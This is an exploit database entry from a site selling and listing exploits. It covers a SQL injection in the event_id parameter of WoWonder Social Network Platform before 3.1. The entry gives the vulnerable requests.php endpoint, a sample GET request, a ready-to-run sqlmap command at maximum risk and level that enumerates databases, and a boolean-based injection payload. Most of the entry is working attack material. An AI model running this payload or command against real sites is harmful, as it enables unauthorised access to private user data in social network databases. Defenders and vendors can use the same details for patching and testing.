[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WoWonder Social Network Platform 3.1 - (event_id) SQL Injection Vulnerability

Author
bot
Risk
[
Security Risk High
]
0day-ID
0day-ID-35969
Category
web applications
Date add
17-03-2021
Platform
php
# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection
# Vendor Homepage: https://www.wowonder.com/
# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
# Version: < 3.1
# Tested on: Linux/Windows

DESCRIPTION

In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter.

The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php.
Example:
/requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID 

if an attacker exploits this vulnerability, attacker may access private data in the database system.

EXPLOITATION

# GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1
# Host: Target

Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs

Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF

#  0day.today [2024-12-26]  #